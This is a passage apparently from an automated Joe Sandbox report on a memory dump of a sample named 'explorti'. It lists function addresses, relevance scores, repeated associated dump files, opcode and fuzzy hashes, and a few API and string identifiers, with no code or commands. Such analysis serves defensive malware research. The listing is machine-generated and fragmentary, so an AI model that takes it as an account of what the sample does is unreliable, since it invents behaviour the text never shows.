                      • Opcode ID: da3bae3f1f968929377bc21c735021256fd565fed029a794c3aad190483b78a1
                      • Instruction ID: 53fdd85ea83a2801cf4190e51c36174f8d904263c92c71bee98b8df334f29a61
                      • Opcode Fuzzy Hash: da3bae3f1f968929377bc21c735021256fd565fed029a794c3aad190483b78a1
                      • Instruction Fuzzy Hash: 7051B4716083D18FD719CF2D851563AFFE1BF99200F084A9EE0DA97292D774E504CB92
                      Function 00ED775B Relevance: .1, Instructions: 104COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89613c71693a2eeec8e4f37646b295dd234442cb54d274b8acd7bc31865bcdb7
                      • Instruction ID: 043a705628b68b00b901b8d11c67a296ccee91407465f7d3e8e85bd2cd1a9a81
                      • Opcode Fuzzy Hash: 89613c71693a2eeec8e4f37646b295dd234442cb54d274b8acd7bc31865bcdb7
                      • Instruction Fuzzy Hash: EF21B673F204394B770CC57E8C5727DB6E1C78C641745423AE8A6EA2C1D968D917E2E4
                      Function 00ED763B Relevance: .1, Instructions: 81COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6b215f50ad94862740c78f28f570e6e5f582c4a8cd198d02c0622c2edf23942
                      • Instruction ID: 1bc908c3d3608b0fafc36cd07bbbaf02aab87c0e0b20487eacb106805fd5ff8b
                      • Opcode Fuzzy Hash: d6b215f50ad94862740c78f28f570e6e5f582c4a8cd198d02c0622c2edf23942
                      • Instruction Fuzzy Hash: 9C11A323F30C255A675C816D8C172BAA2D2EBD825030F533AD876E7384F9A4DE23D290
                      Function 00ED8700 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: cfc8f48425a756ae4ad14b23319e82a1e4c335b697e2f73862df227fd2a788d4
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 63112B7B20008287D6048A2DCAF86B6A795EBC532873D63BBD152EB754DA2299479600
                      Function 00EC643B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8dada3f661cfede07589753502b1ec3eb6806f1d34420d831000289823b62c2
                      • Instruction ID: 0fa3b89a549f2278f04b42fd07c2502faad9c41ca109576429ec8a2aff00dbb9
                      • Opcode Fuzzy Hash: a8dada3f661cfede07589753502b1ec3eb6806f1d34420d831000289823b62c2
                      • Instruction Fuzzy Hash: 09E086300415086EDF297F14D908F4E3BB9FF5174CF049418F8145A621CB26ED83C540
                      Function 00ECA1A2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: 1641b46298485b61cbfe10f067b6bf83cc8ea270a4db1b4fabaabe3f5d8110f3
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 89E08672912238EBC714DB88C604E4AF3FCE744B08F19046AB501E3151C271DF01C7D0
                      Function 00E92DC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                      • String ID:
                      • API String ID: 57040152-0
                      • Opcode ID: 60f3f83412b39d62aa6634b973334f71c9a9df5821fefb7222bf5764c0868a92
                      • Instruction ID: 015a497b7b8a6a93175acebb0f1f78557dfa7508f36f9e991e54c047d1842095
                      • Opcode Fuzzy Hash: 60f3f83412b39d62aa6634b973334f71c9a9df5821fefb7222bf5764c0868a92
                      • Instruction Fuzzy Hash: A3A1E070A01205AFDF11DB74C944BAAB7F8EF19318F149569E915FB282EB34EA04CBD1
                      Function 00EC70A9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: 19a362604a6be5518b95bb1330cbebb414a0a068dd971bfb43785755f95c2205
                      • Instruction ID: 0fcddd3191c2d54d4aee5b44dd7302a053948acdd5a56d86cb1cfa5bb6d7fcd3
                      • Opcode Fuzzy Hash: 19a362604a6be5518b95bb1330cbebb414a0a068dd971bfb43785755f95c2205
                      • Instruction Fuzzy Hash: C901E127A0872925261564199E03F37678C8F92BB8B2A202EFD84F72C2EE56DC0345A0
                      Function 00EA7840 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                      Download Yara Rule
                      APIs
                      • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA792C
                      • __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7938
                      • __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7941
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                      • String ID: L+
                      • API String ID: 4078500453-1478590641
                      • Opcode ID: 02ff272cea51f65da8784fe0133a3a78f7a5e764bcfdce7f9ec9b0c24baa8381
                      • Instruction ID: ca1a0c9eae0f3ec1f1bbca36bc59aff0ec1f0ea067b9c544abc16b5d1b0ca4ff
                      • Opcode Fuzzy Hash: 02ff272cea51f65da8784fe0133a3a78f7a5e764bcfdce7f9ec9b0c24baa8381
                      • Instruction Fuzzy Hash: 8631F5B19043049BD724DF68DC45A5BB7E8EF49310F10162EE986EB642EB75FA44C3A1
                      Function 00ECC990 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: 0ed73cb3cc0e7134824f237b54d8bc62b7c1c4ca2e1cd7e93329ca12d1551db2
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 1EB114329002459FDB15CF68CA82FAEBBE5EF45304F24956EE849BB341D6368D03CB60
                      Function 00EABA72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 6eadd37310fba06995abb06da090ad793f3fca2c7e8aad07b0466e054786f9b5
                      • Instruction ID: b19d9b76f1ca14c23472d905accb9081ca10fde6a966192706365dbad7642350
                      • Opcode Fuzzy Hash: 6eadd37310fba06995abb06da090ad793f3fca2c7e8aad07b0466e054786f9b5
                      • Instruction Fuzzy Hash: 3F211B71E00119AFDF00EFA4D8819BEB7B8AF4E714F605059F901BB2A1DB71AD059BA0
                      Function 00EA7010 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                      Download Yara Rule
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 00EA723C
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: 0z$py
                      • API String ID: 3366076730-244771282
                      • Opcode ID: 55230cadff279e777ac8a2e2b474b39f8c9b0176a3fac27656f99e958ac88f52
                      • Instruction ID: 1c42c88f61054fa1d007a45f418f822d371a9114d4a2ca2290f7bd59d22652b2
                      • Opcode Fuzzy Hash: 55230cadff279e777ac8a2e2b474b39f8c9b0176a3fac27656f99e958ac88f52
                      • Instruction Fuzzy Hash: 90A146B0A016198FDB21CFA9C88479EBBF0FF59704F188559E849AF351EB35AD01CB90
                      Function 00ECF1FF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___free_lconv_mon
                      • String ID: 8"$`'
                      • API String ID: 3903695350-1436819768
                      • Opcode ID: e87a1e40bc26cc314408ae8f716d38908c230001186c36afdb1755b05df68790
                      • Instruction ID: 56d9e86f41cd1ccf48f447b2c894d06abb247a2686b7c6a945c5ae385dd9ac3b
                      • Opcode Fuzzy Hash: e87a1e40bc26cc314408ae8f716d38908c230001186c36afdb1755b05df68790
